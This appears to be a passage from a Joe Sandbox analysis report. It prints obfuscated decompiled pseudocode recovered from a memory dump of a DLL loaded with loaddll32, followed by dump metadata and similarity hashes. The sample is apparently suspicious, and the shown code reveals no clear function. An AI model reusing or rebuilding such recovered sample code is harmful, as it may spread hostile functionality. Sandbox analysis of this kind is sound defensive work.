            												_t718 = _t718 - 1;
            												 *0x6d55d5d4 = _t718;
            												__eflags =  *((intOrPtr*)(_t807 + _t631 * 8)) -  *((intOrPtr*)(_t977 + _t913 * 8));
            												if( *((intOrPtr*)(_t807 + _t631 * 8)) >=  *((intOrPtr*)(_t977 + _t913 * 8))) {
            													goto L20;
            												} else {
            													__eflags =  *((intOrPtr*)(_a20 + _t718 * 8)) -  *0x6d55d5b8; // 0x0
            													if(__eflags != 0) {
            														goto L20;
            													} else {
            														_t635 =  *0x6d55d5ac; // 0x0
            														_t990 =  *0x6d55d5bc; // 0x0
            														_t809 = _v36;
            														_t732 =  *0x6d55d58a; // 0x0
            														_v16 = _t635;
            														 *0x6d55d5ac = _t635 - 1;
            														_v4 =  *(_t809 + 0x27de) & 0x0000ffff;
            														_t733 = _t732 + 1;
            														_v8 =  *((intOrPtr*)(_t990 + _v4 * 4)) - 0x1b0e;
            														_t640 = _v28;
            														 *0x6d55d58a = _t733;
            														 *0x6d55d598 = _t640 - 1;
            														_t642 =  *0x6d55d584; // 0x0
            														_t643 = _t642 - 1;
            														 *0x6d55d584 = _t643;
            														_push( *((intOrPtr*)(_a8 + ( *0x6d55d5c0 & 0x0000ffff) * 4)));
            														_push(0x1701 -  *0x6d55d590);
            														 *0x6d55d5c0 =  *0x6d55d5c0 + 0xffff;
            														_push( *((intOrPtr*)(_t643 * 0xc + _t990)));
            														_push(( *(_t809 + _t640 * 4) & 0x0000ffff) % (_t733 & 0x000000ff));
            														_push(_v4);
            														_push(_v8);
            														_push(_v16);
            														_push(_a12);
            														_t735 = (E6D519823() & 0x0000ffff) + 1;
            														_t813 = _t735 & 0x0000ffff;
            														_t958 =  *0x6d55d598; // 0x0
            														_v28 =  *((intOrPtr*)(_v20 + 0xe4c));
            														_v16 =  *(_a4 + _t813 * 4) * _t813;
            														_t654 =  *0x6d55d5d4; // 0x0
            														 *0x6d55d5d4 = _t654 - 1;
            														_t656 =  *0x6d55d5b8; // 0x0
            														_v8 = _t654 | 0x0000142a;
            														_v4 = _t656 - _t813;
            														_t736 = _t735 + 0xffff;
            														_t992 = _t736 & 0x0000ffff;
            														_a12 = _t736;
            														_t737 =  *0x6d55d5dc; // 0x0
            														_t664 =  *0x6d55d5b4; // 0x0
            														_t666 =  *0x6d55d5c8; // 0x0
            														_push(0x87f);
            														_push( *0x6d55d5c4 & 0x0000ffff &  *0x6d55d588 & 0x0000ffff);
            														_push( *(_t666 + _t992 * 4) ^ _t958);
            														_push(_t664 % ( *(_v36 + 0xe + _t992 * 2) & 0x0000ffff));
            														_push( *0x6d55d58c);
            														 *0x6d55d598 = _t958 - 1;
            														_push( *0x6d55d5d8);
            														_push(_t737 *  *0x6d55d5a0);
            														_push( *(_a8 + _t958 * 4) % ( *(_t992 + _v52) & 0x000000ff));
            														_push(_v4);
            														_push(_v8);
            														_push(_v16);
            														_push(_v28);
            														_t668 = E6D515CA6();
            														_t869 = _a12;
            														_t1014 = _t1013 + 0x50;
            														_t1001 = _a24;
            														_t979 = _a16;
            														 *((intOrPtr*)(_a8 + 0x20 + (_t869 & 0x0000ffff) * 4)) = _t668;
            													}
            												}
            											}
            										}
            										_t548 =  *0x6d55d588; // 0x0
            										_t549 = _t548 + 1;
            										_t950 = _v12;
            										_t870 = _t869 + 1;
            										 *0x6d55d588 = _t549;
            										_t720 = _t870 & 0x0000ffff;
            										_a12 = _t870;
            										_v4 = _t720;
            										 *((short*)(_t720 * 6 + _v36)) = (_t549 & 0x0000ffff) / (_t549 & 0x0000ffff);
            										_t784 = _v52;
            										 *(_t979 + 8 + _t720 * 4) = 0xb44 % ( *(_t979 + 8 + _t720 * 4) & 0x000000ff);
            										_t554 =  *_t950 * 3;
            										__eflags =  *((intOrPtr*)(_t554 + _t784)) - _v48;
            										_t785 =  *0x6d55d598; // 0x0
            										if( *((intOrPtr*)(_t554 + _t784)) != _v48) {
            											L23:
            											_t555 =  *0x6d55d57c; // 0x0
            											__eflags = _t555 -  *0x6d55d5e4; // 0x0
            											if(__eflags > 0) {
            												goto L25;
            											} else {
            												 *0x6d55d5e4 = _t785;
            											}
            										} else {
            											_t627 = _a4;
            											__eflags =  *((intOrPtr*)(_t627 + _t785 * 4)) - _v24;
            											if( *((intOrPtr*)(_t627 + _t785 * 4)) != _v24) {
            												L25:
            												_t980 =  *0x6d55d5e0; // 0x0
            												_t786 =  *0x6d55d578; // 0x0
            												_t981 = _t980 - 1;
            												_t721 = _v20;
            												 *0x6d55d5e0 = _t981;
            												 *0x6d55d5b0 = 0xc4a;
            												 *((intOrPtr*)(_v44 + _t981 * 4)) = (_v57 & 0x000000ff) /  *(_t721 + _t786 * 4) / _v24 -  *((intOrPtr*)(_v44 + _t981 * 4));
            												_t788 =  *0x6d55d59c; // 0x0
            												_t982 =  *0x6d55d57c; // 0x0
            												 *0x6d55d5d4 = (( *0x6d55d5d0 & 0x0000ffff | _t982) & _t788 & 0x0000ffff) -  *0x6d55d5d4;
            												 *0x6d55d59c = _t788 + 1;
            												_t790 =  *0x6d55d594; // 0x0
            												 *0x6d55d57c = _t982 + 1;
            												 *(_t790 + _v4 * 4) =  *(_t790 + _v4 * 4) ^  *0x6d55d58a & 0x000000ff;
            												 *_t1001 =  *_t1001 + 1;
            												_t984 =  *_t1001;
            												_t562 =  *0x6d55d5bc; // 0x0
            												_t887 = _t984 + _t984;
            												__eflags =  *((intOrPtr*)(_t562 + _t887 * 8)) - 0x1a0e;
            												if( *((intOrPtr*)(_t562 + _t887 * 8)) < 0x1a0e) {
            													_t1002 =  &_a4;
            													_t985 =  *(_a8 + _t984 * 4);
            													_t564 =  *0x6d55d5a0; // 0x0
            													_t565 = _t564 - 1;
            													_a4 = _t985;
            													 *0x6d55d5a0 = _t565;
            													_t566 = _t565 + _t565;
            													__eflags = _t985 -  *((intOrPtr*)(_t950 + _t566 * 8));
            													if(_t985 <=  *((intOrPtr*)(_t950 + _t566 * 8))) {
            														_t888 = _v40;
            														_a8 = _t888 & 0x000000ff;
            														_v16 = _t1002 + (_t985 << 4);
            														_a16 = _t721 + _t985 * 4;
            														_a24 = _t950 + _t985 * 0xc;
            														_t575 = _a20 - _t721;
            														__eflags = _t575;
            														_v4 = _t575;
            														do {
            															_t791 = _v32;
            															_push(0x177a);
            															_v40 = _t888 + 1;
            															_t792 =  *0x6d55d574; // 0x0
            															_t580 = _v40 & 0x000000ff;
            															_a8 = _t580;
            															_a12 = _a12 + 1;
            															_push(_a12 & 0x0000ffff);
            															_push(_t792 - _a4);
            															_push( *0x6d55d588 & 0x0000ffff | _t580);
            															_push(_v24);
            															_push(0x8b9);
            															_push(_t985 *  *0x6d55d580);
            															_t987 = _a4;
            															_push(( *(_t791 + _t985 * 8) & 0x0000ffff) /  *0x6d55d580);
            															_push( *(_t791 +  *_t950 * 8) & 0x0000ffff | _a8);
            															_push( *0x6d55d5a4);
            															_push(_t987);
            															_push( *0x6d55d5d8);
            															_t583 = E6D515CA6();
            															_t952 = _v44;
            															_t724 = _a12;
            															 *((intOrPtr*)(_t1002 + ( *_t1002 +  *_t1002) * 8)) = _t583;
            															_t584 =  *0x6d55d5e0; // 0x0
            															 *0x6d55d580 =  *((intOrPtr*)(_t952 + _t584 * 8)) + 0x1286;
            															_t589 =  *0x6d55d5a0; // 0x0
            															_a12 = _t724 + 1;
            															_push( *((intOrPtr*)(_t952 + _t589 * 4)));
            															_t953 = _a16;
            															asm("cdq");
            															_push(0x193a /  *(_v4 + _t953));
            															_t592 =  *0x6d55d5a8; // 0x0
            															_push( *(_t592 + 0x69a4) &  *0x6d55d5ac);
            															asm("cdq");
            															_t728 = _a24;
            															_push(_t987);
            															_push(_t987 / 0xb47);
            															_push( *0x6d55d578);
            															_push( *(_v32 + (_t724 & 0x0000ffff) * 6) & 0x0000ffff ^ _a8);
            															_push( *( *_t1002 * 0xc + _a20) /  *_t728);
            															E6D519823();
            															_t1014 = _t1014 + 0x50;
            															_t799 = _v16;
            															_a16 = _t953 + 4;
            															_t950 = _v12;
            															_a24 =  &(_t728[3]);
            															_t888 = _v40;
            															_t985 = _t987 + 1;
            															 *_t799 = (_t987 -  *_t953) /  *_t799;
            															_t604 =  *0x6d55d5a0; // 0x0
            															_t605 = _t604 - 1;
            															_a4 = _t985;
            															 *0x6d55d5a0 = _t605;
            															_t606 = _t605 + _t605;
            															_v16 =  &(_t799[4]);
            															__eflags = _t985 -  *((intOrPtr*)(_t950 + _t606 * 8));
            														} while (_t985 <=  *((intOrPtr*)(_t950 + _t606 * 8)));
            													}
            												} else {
            													_t801 =  *0x6d55d5a8; // 0x0
            													_t607 =  *0x6d55d5e0; // 0x0
            													_t730 = _a16;
            													_push(0x163b);
            													 *((intOrPtr*)(_t801 + _t887 * 8)) = _t607 -  *((intOrPtr*)(_t801 + _t887 * 8));
            													_t802 =  *0x6d55d5d4; // 0x0
            													_t988 =  *0x6d55d598; // 0x0
            													_a20 =  *(_v36 + 0x19c4) & 0x0000ffff;
            													_t612 =  *0x6d55d5c0; // 0x0
            													_t803 = _t802 + 1;
            													_a4 = ( *(_v32 + 0xe + _t802 * 2) & 0x0000ffff) - ( *(_t730 + 0x101e) & 0x000000ff);
            													_t613 = _t612 + 1;
            													 *0x6d55d5d4 = _t803;
            													 *0x6d55d5c0 = _t613;
            													_t614 = _t613 & 0x0000ffff;
            													_a8 = 0xe90 -  *((intOrPtr*)(_t950 + 0x20 + _t614 * 4));
            													_t906 =  *0x6d55d5d8; // 0x0
            													_t989 = _t988 + 1;
            													_t907 = _t906 + 1;
            													_t617 =  *0x6d55d5bc; // 0x0
            													 *0x6d55d5d8 = _t907;
            													 *0x6d55d598 = _t989;
            													_push( *((intOrPtr*)(_t617 + 0x2adc)));
            													_t619 =  *0x6d55d5a8; // 0x0
            													_push( *(_t619 +  *(_a24 - 4) * 4) & _t907);
            													_t622 =  *0x6d55d580; // 0x0
            													_t624 =  *0x6d55d57c; // 0x0
            													_push(_t622 % 0x70a);
            													asm("cdq");
            													_push( *0x6d55d5dc);
            													_push(_t624 / _t989);
            													_push(_t950[_t803] + 0xff6);
            													_push( *( *_a24 + _t730) & 0x000000ff);
            													_push(0x307 - _t950[_t614]);
            													_push(_a8);
            													_push(_a4);
            													_push(_a20);
            													E6D515CA6();
            												}
            											} else {
            												goto L23;
            											}
            										}
            									} else {
            										_t931 =  *0x6d55d588; // 0x0
            										_t932 = _t931 + 0xffff;
            										 *0x6d55d588 = _t932;
            										 *(_a8 + ( *_t1001 << 4)) = (_t932 & 0x0000ffff) /  *(_a8 + ( *_t1001 << 4));
            									}
            								}
            							}
            						}
            					}
            				} else {
            					_t695 =  *0x6d55d5d4; // 0x0
            					_t696 =  *0x6d55d570; // 0x0
            					_t697 =  *0x6d55d588; // 0x0
            					_t830 =  *0x6d55d5dc; // 0x0
            					_t698 = _t697 + 1;
            					 *0x6d55d588 = _t698;
            					_push(_t830 - (_t698 & 0x0000ffff));
            					_t700 = E6D507EB5( *( *0x6d55d578 * 3 + _v52) & 0x000000ff &  *0x6d55d5d0 & 0x0000ffff,  *((intOrPtr*)(_t969 + _t695 * 4)),  *0x6d55d59c & 0x0000ffff,  *0x6d55d5a0, 0x6ed,  *(_t696 + (_t850 & 0x0000ffff) * 4) * _t1001[_t850 & 0x0000ffff], 0x159f, 0x436, 0x27b,  *0x6d55d5a4);
            					_push(0x1488);
            					 *((intOrPtr*)(_a4 +  *_t1001 * 4)) = _t700;
            					_t701 =  *0x6d55d590; // 0x0
            					_t702 = _t701 - 1;
            					_t965 =  *0x6d55d5dc; // 0x0
            					 *0x6d55d590 = _t702;
            					_t705 =  *0x6d55d574; // 0x0
            					_a4 = (_v57 & 0x000000ff) * _t702;
            					_t940 =  *0x6d55d5b0; // 0x0
            					_t835 =  *0x6d55d5e0; // 0x0
            					_t79 = _t705 - 0x10f5; // -4341
            					 *0x6d55d574 = _t705 - 1;
            					 *((intOrPtr*)((_v56 - 0x00000001 & 0x0000ffff) * 0xc + _a8)) = E6D507EB5(0x187, _a4, 0x1268 %  *0x6d55d58c, _t940 | 0x00000f17, _t965 ^ 0x0000033c, _t79, 0x222, _t835 ^ _v24, ( *0x6d55d5c0 & 0x0000ffff) * (_v57 & 0x000000ff), 0x1312);
            					asm("cdq");
            					 *(_a20 +  *_a24 * 4) = ( *0x6d55d59c & 0x0000ffff | _a12) %  *(_a20 +  *_a24 * 4);
            				}
            				_t507 =  *0x6d55d574; // 0x0
            				return _t507;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • Opcode ID: 15d2bbc16171495fdffbc2ad7fdf7d10b4f4cfa8b5a54e9e65988c3032f713ac
            • Instruction ID: 1120560437b922ccac3d8f85c624a172d0b2784db8ca312e4fd76f8f11056914
            • Opcode Fuzzy Hash: 15d2bbc16171495fdffbc2ad7fdf7d10b4f4cfa8b5a54e9e65988c3032f713ac
            • Instruction Fuzzy Hash: 23824A766082509FDB16DF19C480A26BBF1FBCA308F16446EF886C7B51E7B4A851CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E6D5061B5() {
            				signed int _t463;
            				signed int _t464;
            				intOrPtr _t470;
            				signed int _t473;
            				intOrPtr _t479;
            				signed int _t484;
            				intOrPtr _t487;
            				signed short _t503;
            				signed int _t510;
            				signed int _t516;
            				intOrPtr _t520;
            				intOrPtr _t526;
            				intOrPtr _t527;
            				signed int _t528;
            				intOrPtr _t546;
            				signed int _t564;
            				signed int _t567;
            				signed short _t569;
            				signed short _t570;
            				signed int _t580;
            				signed int _t582;
            				signed int _t584;
            				signed int _t585;
            				signed short _t587;
            				signed int _t588;
            				signed int _t591;
            				intOrPtr _t596;
            				signed int _t601;
            				signed int _t606;
            				signed int _t608;
            				signed int _t613;
            				signed int _t614;
            				signed int _t615;
            				signed short _t619;
            				signed int _t624;
            				signed short _t630;
            				signed int _t635;
            				char _t648;
            				intOrPtr _t652;
            				signed char _t655;
            				intOrPtr _t657;
            				signed int _t661;
            				intOrPtr _t663;
            				intOrPtr _t665;
            				signed int _t666;
            				signed int _t667;
            				intOrPtr _t669;
            				signed int _t679;
            				signed int _t680;
            				signed int _t681;
            				signed int _t683;
            				signed int _t687;
            				signed int _t688;
            				signed int _t690;
            				signed int _t694;
            				signed int _t696;
            				signed int _t702;
            				signed int _t703;
            				signed int _t708;
            				intOrPtr _t713;
            				signed int _t715;
            				intOrPtr _t724;
            				signed int _t733;
            				intOrPtr _t737;
            				signed int _t738;
            				signed int _t739;
            				signed int _t740;
            				signed char _t754;
            				signed short _t768;
            				signed int _t769;
            				signed int _t777;
            				signed int _t778;
            				intOrPtr _t779;
            				signed short _t792;
            				signed int _t796;
            				signed int _t813;
            				signed int _t815;
            				signed int _t818;
            				signed short _t826;
            				signed int _t829;
            				signed int _t832;
            				signed int _t833;
            				signed short _t834;
            				signed short _t837;
            				signed short _t838;
            				signed int _t839;
            				signed int _t844;
            				signed int _t845;
            				signed int _t847;
            				signed int _t848;
            				signed int _t849;
            				signed int _t854;
            				signed int _t856;
            				signed int _t858;
            				signed int _t859;
            				signed int* _t860;
            				signed int _t861;
            				signed int _t862;
            				signed int _t863;
            				signed int _t865;
            				signed int _t867;
            				signed int _t869;
            				signed short _t872;
            				signed int _t874;
            				intOrPtr _t875;
            				signed int _t878;
            				signed short _t880;
            				void* _t883;
            				void* _t892;
            				void* _t895;
            
            				_t779 =  *((intOrPtr*)(_t883 + 0x60));
            				_t679 =  *(_t883 + 0x6c);
            				_t875 =  *((intOrPtr*)(_t883 + 0x58));
            				_t854 =  *(_t883 + 0x64);
            				_t844 =  *0x6d55d5dc; // 0x0
            				 *(_t883 + 0x48) = 0x1c33;
            				_t463 =  *0x6d55d584; // 0x0
            				 *(_t883 + 0x44) = _t463;
            				_t464 =  *0x6d55d5d8; // 0x0
            				 *(_t883 + 0x40) = _t464;
            				 *(_t883 + 0x54) =  *(( *0x6d55d588 & 0x0000ffff) + _t854 + 0x18) & 0x000000ff &  *(_t779 + 0x31a0) & 0x0000ffff;
            				_t687 =  *(_t883 + 0x64);
            				 *(_t883 + 0x38) = _t687;
            				_t688 = _t687 - 1;
            				_t845 = _t844 + 1;
            				 *(_t883 + 0x64) = _t688;
            				 *0x6d55d5dc = _t845;
            				 *(_t883 + 0x18) =  *((intOrPtr*)(_t779 + 0x3d1c)) -  *((intOrPtr*)(_t779 + _t679 * 2)) & 0x0000ffff;
            				 *(_t883 + 0x34) = _t688 ^ 0x0000025f;
            				_t470 =  *0x6d55d5bc; // 0x0
            				_t690 =  *0x6d55d5d4; // 0x0
            				 *(_t883 + 0x1c) = ( *(_t875 + 0x18e6) & 0x000000ff) - 0x000000d3 & 0x0000ffff;
            				 *(_t883 + 0x3c) = _t845 | 0x000007b3;
            				 *(_t883 + 0x4c) =  *(_t470 + _t679 * 4) |  *0x6d55d590;
            				_t473 =  *0x6d55d5a4; // 0x0
            				 *(_t883 + 0x30) = _t473;
            				 *(_t883 + 0x2c) =  *( *(_t883 + 0x44) + _t854) & 0x000000ff;
            				_t680 = _t679 - 1;
            				 *(_t883 + 0x20) = ( *(_t883 + 0x74) ^ 0x00000768) & 0x0000ffff;
            				_t479 =  *0x6d55d5c8; // 0x0
            				 *(_t883 + 0x14) = _t680;
            				 *(_t883 + 0x13) =  *((intOrPtr*)(_t479 + _t690 * 4)) + 0x37;
            				 *0x6d55d5d4 = _t690 + 1;
            				 *(_t883 + 0x28) =  *(_t854 + _t680 + 8) & 0x000000ff ^ _t680;
            				_t681 = _t680 + 2;
            				_t484 =  *0x6d55d598; // 0x0
            				asm("cdq");
            				_t847 = _t484 % ( *(_t875 + 0x1e93) & 0x000000ff);
            				 *(_t883 + 0x24) = _t847;
            				 *_t847 =  *_t847 - 1;
            				_t487 =  *0x6d55d594; // 0x0
            				if( *((intOrPtr*)(_t487 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) == ( *( *_t847 + _t854 + 2) & 0x000000ff)) {
            					L32:
            					_t694 =  *(_t883 + 0x14);
            					_t681 = _t681 - 1;
            					 *(_t883 + 0x20) = _t694 *  *0x6d55d57c -  *(_t883 + 0x20) & 0x0000ffff;
            					 *(_t883 + 0x14) = _t694 + 1;
            					_t696 =  *0x6d55d5e0; // 0x0
            					 *((char*)(_t696 + _t875)) = _t681 % 0xff7 -  *((intOrPtr*)(_t696 + _t875));
            					_t856 =  *0x6d55d5e4; // 0x0
            					asm("cdq");
            					 *0x6d55d5a0 = ( *0x6d55d588 & 0x0000ffff |  *(_t883 + 0x74) & 0x0000ffff) %  *0x6d55d5a0;
            					 *0x6d55d5c0 = _t856 % ( *0x6d55d5c0 & 0x0000ffff);
            					 *0x6d55d5e4 = _t856 - 1;
            					 *(_t883 + 0x13) = 0x1377 % ( *(_t883 + 0x13) & 0x000000ff);
            					 *(_t883 + 0x78) =  *(_t883 + 0x20);
            					L21:
            					_t792 =  *(_t883 + 0x18);
            					L22:
            					_t503 =  *(_t883 + 0x1c) + 1;
            					_t858 = _t503 & 0x0000ffff;
            					 *(_t883 + 0x1c) = _t503;
            					 *(_t883 + 0x44) = _t792 & 0x0000ffff;
            					asm("cdq");
            					 *( *(_t883 + 0x38) + _t858 * 4) = 0x1393 /  *(_t883 + 0x44) %  *( *(_t883 + 0x38) + _t858 * 4);
            					_t702 =  *0x6d55d598; // 0x0
            					_t796 =  *(_t883 + 0x2c);
            					_t703 = _t702 + 1;
            					_t510 = ( *0x6d55d5c0 & 0x0000ffff) * 6;
            					 *0x6d55d598 = _t703;
            					__eflags = ( *(_t510 + _t796 + 2) & 0x0000ffff) -  *((intOrPtr*)(0x7c + _t703 * 4));
            					if(( *(_t510 + _t796 + 2) & 0x0000ffff) >  *((intOrPtr*)(0x7c + _t703 * 4))) {
            						 *((char*)(_t858 + _t875)) = 0x1710 / ( *(_t883 + 0x74) & 0x0000ffff) -  *((intOrPtr*)(_t858 + _t875));
            						_t516 =  *0x6d55d584; // 0x0
            						 *0x6d55d58c = 0x1b3d;
            						_t859 = _t858 * 3;
            						asm("cdq");
            						_t708 =  *(_t859 +  *(_t883 + 0x68)) & 0x000000ff;
            						__eflags = (0x773 - ( *(_t516 +  *(_t883 + 0x6c)) & 0x000000ff)) % _t708;
            						 *(_t859 +  *(_t883 + 0x68)) = 0x773 / _t708;
            						L34:
            						_t520 =  *0x6d55d5bc; // 0x0
            						asm("cdq");
            						 *(_t520 +  *_t847 * 4) = ( *((intOrPtr*)( *(_t883 + 0x34) + 0x45e0)) - 0x00000045 & 0x0000020d) /  *(_t520 +  *_t847 * 4);
            						_t526 =  *0x6d55d5b8; // 0x0
            						_t527 = _t526 + 1;
            						 *0x6d55d5b8 = _t527;
            						__eflags =  *0x6d55d57c - _t527; // 0x0
            						if(__eflags != 0) {
            							_t528 =  *0x6d55d5d4; // 0x0
            							_t713 =  *((intOrPtr*)( *(_t883 + 0x2c) + _t528 * 2));
            							 *0x6d55d5d4 = _t528 - 1;
            							__eflags = _t713 -  *0x6d55d588; // 0x0
            							if(__eflags > 0) {
            								_t848 =  *(_t883 + 0x78) & 0x0000ffff;
            								_t860 =  *(_t883 + 0x24);
            								asm("cdq");
            								 *((short*)( *(_t883 + 0x30) + 4 + _t681 * 2)) = (_t848 | 0x000019d6) / 0x155b -  *((intOrPtr*)( *(_t883 + 0x30) + 4 + _t681 * 2));
            								 *_t860 =  *_t860 + 1;
            								 *(0x7c +  *_t860 * 4) =  *(0x7c +  *_t860 * 4) |  *(_t875 + 0x28e) & 0x000000ff | 0x00001b01;
            								 *( *((intOrPtr*)(_t883 + 0x70)) + ( *(_t883 + 0x1c) & 0x0000ffff) * 2) = ( *( *(_t883 + 0x4c) + 0x3d1e) & 0x0000ffff) / ( *(_t681 + _t875 + 1) & 0x000000ff) ^  *( *(_t883 + 0x3c) + 0x84f) & 0x000000ff;
            								_t875 =  *((intOrPtr*)(_t883 + 0x60));
            								 *((short*)( *(_t883 + 0x30) + 2 + _t681 * 2)) =  *(_t883 + 0x64) -  *((intOrPtr*)( *(_t883 + 0x30) + 2 + _t681 * 2));
            								_t546 =  *0x6d55d5a8; // 0x0
            								_t861 =  *_t860 * 0xc;
            								_t724 =  *0x6d55d5bc; // 0x0
            								_t454 = _t861 + _t724 + 0x74;
            								 *_t454 =  *(_t861 + _t724 + 0x74) &  *(_t546 + _t848 * 4) /  *0x6d55d584;
            								__eflags =  *_t454;
            							}
            						} else {
            							 *_t847 =  *_t847 + 1;
            							 *((intOrPtr*)(0x7c +  *(_t883 + 0x14) * 4)) = ( *( *_t847 + _t875 + 4) & 0x000000ff) -  *((intOrPtr*)(0x7c +  *(_t883 + 0x14) * 4)) + 0x8f5;
            							_t862 =  *0x6d55d5e0; // 0x0
            							_t863 = _t862 - 1;
            							 *0x6d55d5e0 = _t863;
            							 *(_t863 +  *(_t883 + 0x6c)) = ( *(( *(_t883 + 0x78) & 0x0000ffff) +  *(_t883 + 0x68)) & 0x000000ff) / ( *(_t863 +  *(_t883 + 0x6c)) & 0x000000ff);
            						}
            						_t715 =  *(( *(_t883 + 0x1c) & 0x0000ffff) + _t875) & 0x000000ff;
            						L39:
            						return ( *(_t883 + 0x74) & 0x0000ffff) - _t715;
            					}
            					_t681 = _t681 - 1;
            					 *((char*)(_t858 + _t875)) =  *(_t883 + 0x13) -  *((intOrPtr*)(_t858 + _t875));
            					_push(0x34d);
            					_push(_t681);
            					 *(_t883 + 0x38) =  *(_t883 + 0x28) - 1;
            					_t564 =  *0x6d55d5b4; // 0x0
            					E6D50135E(_t564 -  *((intOrPtr*)( *(_t883 + 0x44) + _t858 * 4)), 0x510,  *(_t883 + 0x8c) & 0x0000ffff,  *(_t681 * 3 +  *(_t883 + 0x78)) & 0x000000ff ^ 0x00000d91,  *(_t883 + 0x28) - 1,  *(_t883 + 0x44) & 0x00000efa);
            					_t567 =  *0x6d55d590; // 0x0
            					_t883 = _t883 + 0x20;
            					 *(_t883 + 0x20) = _t567;
            					__eflags = _t567 -  *(_t883 + 0x28);
            					if(_t567 ==  *(_t883 + 0x28)) {
            						goto L34;
            					}
            					_t733 = _t567 << 4;
            					__eflags = _t733;
            					 *(_t883 + 0x44) = _t733;
            					 *(_t883 + 0x40) = _t847 + _t567 * 4;
            					do {
            						_t569 =  *0x6d55d59c; // 0x0
            						_t570 = _t569 + 1;
            						 *0x6d55d59c = _t570;
            						 *( *(_t883 + 0x30) + 0x20 +  *_t847 * 2) = (_t570 & 0x0000ffff) / ( *( *(_t883 + 0x30) + 0x20 +  *_t847 * 2) & 0x0000ffff);
            						_t737 =  *0x6d55d570; // 0x0
            						_t865 =  *(_t883 + 0x44);
            						 *(_t865 + _t737) =  *(_t865 + _t737) *  *(_t883 + 0x20);
            						_t738 =  *0x6d55d5ac; // 0x0
            						_t739 = _t738 - 1;
            						 *0x6d55d5ac = _t739;
            						asm("cdq");
            						_t875 =  *((intOrPtr*)(_t883 + 0x60));
            						 *( *(_t883 + 0x68) + 0xf + _t739 * 4) =  *(_t883 + 0x20) %  *( *(_t883 + 0x38) + 0x48 + _t681 * 4) |  *(_t883 + 0x20);
            						_t740 =  *(_t883 + 0x40);
            						_t813 =  *( *_t847 + _t875 + 0x17) & 0x000000ff;
            						__eflags = _t813 -  *_t740;
            						if(_t813 >  *_t740) {
            							goto L29;
            						}
            						_t878 =  *(_t883 + 0x2c);
            						_t849 =  *(_t883 + 0x48) & 0x0000ffff;
            						_t582 =  *0x6d55d5ac; // 0x0
            						do {
            							_t681 = _t681 + 1;
            							 *(_t878 + _t681 * 2) =  *(_t878 + _t681 * 2) ^ (_t582 |  *0x6d55d574);
            							_t584 =  *0x6d55d5ac; // 0x0
            							_t582 = _t584 ^ _t849;
            							_t813 = _t813 + 1;
            							 *0x6d55d5ac = _t582;
            							__eflags = _t813 -  *_t740;
            						} while (_t813 <=  *_t740);
            						_t875 =  *((intOrPtr*)(_t883 + 0x60));
            						_t847 =  *(_t883 + 0x24);
            						L29:
            						_t580 =  *(_t883 + 0x20) + 1;
            						 *(_t883 + 0x44) = _t865 + 0x10;
            						 *(_t883 + 0x20) = _t580;
            						 *(_t883 + 0x40) = _t740 + 4;
            						__eflags = _t580 -  *(_t883 + 0x28);
            					} while (_t580 !=  *(_t883 + 0x28));
            					goto L34;
            				}
            				_t585 =  *0x6d55d598; // 0x0
            				if( *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + _t585 * 2)) >=  *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + 0x3c + ( *0x6d55d588 & 0x0000ffff) * 2))) {
            					goto L32;
            				}
            				_t587 =  *(_t883 + 0x20);
            				 *(_t883 + 0x78) = _t587;
            				_t588 = _t587 & 0x0000ffff;
            				 *(_t883 + 0x50) = _t588;
            				if(( *(_t588 + _t875) & 0x000000ff) < 0xf00) {
            					_t792 =  *(_t883 + 0x18);
            					 *(0xa4 +  *_t847 * 4) = _t792 & 0x0000ffff;
            					goto L22;
            				}
            				_t591 =  *0x6d55d5b0; // 0x0
            				 *0x6d55d5a0 = _t591 *  *0x6d55d5a0;
            				_t815 =  *_t847;
            				if( *(_t883 + 0x40) != ( *(_t815 + _t875) & 0x000000ff)) {
            					L7:
            					_t596 =  *0x6d55d5a8; // 0x0
            					_t681 = _t681 - 1;
            					 *0x6d55d5b0 = ( *( *(_t883 + 0x6c) + 0x9be) & 0x000000ff) % 0xdac;
            					_t818 =  *(_t883 + 0x64);
            					 *(_t681 * 4) =  *(_t681 * 4) &  *(_t596 + 0x1d00);
            					 *0x6d55d5b4 =  *0x6d55d5b4 & (( *(_t854 + _t681) & 0x000000ff) - 0x00001c33 |  *( *(_t883 + 0x3c) + _t681) & 0x000000ff);
            					__eflags =  *0x6d55d5b4;
            					_t749 =  *((intOrPtr*)(_t883 + 0x70));
            					L8:
            					 *(_t883 + 0x40) = _t681;
            					if( *(_t883 + 0x20) > 0x1ea7) {
            						L16:
            						_t601 =  *0x6d55d5d4; // 0x0
            						_t867 =  *0x6d55d5a4; // 0x0
            						 *(_t883 + 0x64) = _t818 + 1;
            						_push(0x18c3);
            						asm("cdq");
            						_t683 = _t681 - 1;
            						_t606 =  *0x6d55d598; // 0x0
            						 *(_t883 + 0x7c) = _t683;
            						_push( *( *((intOrPtr*)(_t883 + 0x70)) + _t606 * 2) & 0x0000ffff);
            						_t608 = E6D50135E(0x19ba,  *0x6d55d5e0, _t867 & _t818 + 0x00000001, 0x76f,  *(_t749 + 0xe + _t601 * 2) & 0x0000ffff |  *(_t681 * 3 +  *(_t883 + 0x68)) & 0x000000ff, 0x1383 %  *0x218c);
            						_t869 =  *(_t883 + 0x34);
            						_t880 =  *(_t883 + 0x8c);
            						 *0x6d55d598 = _t608;
            						_push( *((intOrPtr*)(_t883 + 0x70)));
            						 *0x6d55d5b4 = (( *( *((intOrPtr*)(_t883 + 0x5c)) + _t869 + 6) & 0x000000ff) - ( *(_t880 + 0x3f) & 0x000000ff)) /  *0x6d55d5b4;
